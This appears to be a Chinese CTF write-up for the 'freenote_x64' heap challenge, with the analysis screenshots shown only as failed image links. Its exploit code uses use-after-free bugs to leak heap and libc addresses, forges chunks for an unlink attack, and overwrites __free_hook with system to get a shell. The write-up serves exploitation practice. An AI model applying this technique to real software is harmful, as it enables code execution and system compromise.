保护
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LUxec7QN-1648307049868)(unlink(freenote_x64)].assets/image-20220326225149078.png)](https://img-blog.csdnimg.cn/a71ac3cbe35340aabd755fe18c66df6b.png)
分析
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-17z0knM7-1648307049870)(unlink(freenote_x64)].assets/image-20220326225203435.png)](https://img-blog.csdnimg.cn/ef520e2251cc4247a07aa8419766703e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rmW5Y2X6buE5pmv55Gc,size_20,color_FFFFFF,t_70,g_se,x_16)
init_large_chunk
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KU8Yea1w-1648307049872)(unlink(freenote_x64)].assets/image-20220326225222819.png)](https://img-blog.csdnimg.cn/bcdacbc526e8426e8c33514e77c4ecf4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rmW5Y2X6buE5pmv55Gc,size_20,color_FFFFFF,t_70,g_se,x_16)
show
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P8dDyNOd-1648307049873)(unlink(freenote_x64)].assets/image-20220326225236394.png)](https://img-blog.csdnimg.cn/92537032302b4cb9814b9166cb1b6886.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rmW5Y2X6buE5pmv55Gc,size_20,color_FFFFFF,t_70,g_se,x_16)
new
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tkvnccj8-1648307049874)(unlink(freenote_x64)].assets/image-20220326225248612.png)](https://img-blog.csdnimg.cn/c5db2538069d4d7d8f9606a1f602853a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rmW5Y2X6buE5pmv55Gc,size_20,color_FFFFFF,t_70,g_se,x_16)
edit
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wYGi7kyC-1648307049875)(unlink(freenote_x64)].assets/image-20220326225300092.png)](https://img-blog.csdnimg.cn/ef807c0242c54d57b4345c74d7707a7e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rmW5Y2X6buE5pmv55Gc,size_20,color_FFFFFF,t_70,g_se,x_16)
dele
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ff2tAhcD-1648307049878)(unlink(freenote_x64)].assets/image-20220326225315281.png)](https://img-blog.csdnimg.cn/bc618ce974bd4e3c99830a4a1c31bcf3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rmW5Y2X6buE5pmv55Gc,size_20,color_FFFFFF,t_70,g_se,x_16)
malloc有限制,大小只能为0x80的整数倍如0x80、0x100、0x180
edit有个realloc函数且带有uaf漏洞
dele函数也有uaf漏洞,当时没注意到!!!
因为dele函数有uaf所以realloc的uaf漏洞本exp没用到。。。。。。
思路
因为有uaf就可以很方便的泄漏heap地址和libc地址
add(0x80,'0') #0
add(0x80,'1') #0
add(0x80,'2') #0
add(0x80,'3') #0
dele(0)
dele(2)
add(8,'0'*8) #0
add(8,'2'*8) #0
show()
ru('0'*8)
heap = info(rc(4),'heap') - (0x12c7940-0x12c6000)
ru('2'*8)
libc.address = info(rc(6),'libc') -(0x7f64dfb65b78-0x7f64df7a1000)
再去掉所有的堆块,便于后面伪造堆块
dele(3)
dele(2)
dele(1)
dele(0)
然后通过edit函数一次性伪造全部堆块,再进行unlink操作
target = heap + 0x30
payload = p64(0) + p64(0x111) + p64(target - 0x18) + p64(target - 0x10)
add(len(payload),payload)
payload = b'/bin/sh\x00' + b"A"*0x78 + p64(0x110) + p64(0x90) + b"B"*0x80
payload += p64(0) + p64(0x91) + b"C"*0x80
add(len(payload), payload)
dele(2)#unlink
getshell
payload = p64(1)*2 + p64(8) + p64(libc.symbols['__free_hook'])
edit(0,len(payload),payload)
payload = p64(libc.symbols['system'])
edit(0,len(payload),payload)
截图
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-v0JUF1p6-1648307049879)(unlink(freenote_x64)].assets/image-20220326230021136.png)](https://img-blog.csdnimg.cn/f77f0cf98ad14da481f398f00c736bc1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rmW5Y2X6buE5pmv55Gc,size_20,color_FFFFFF,t_70,g_se,x_16)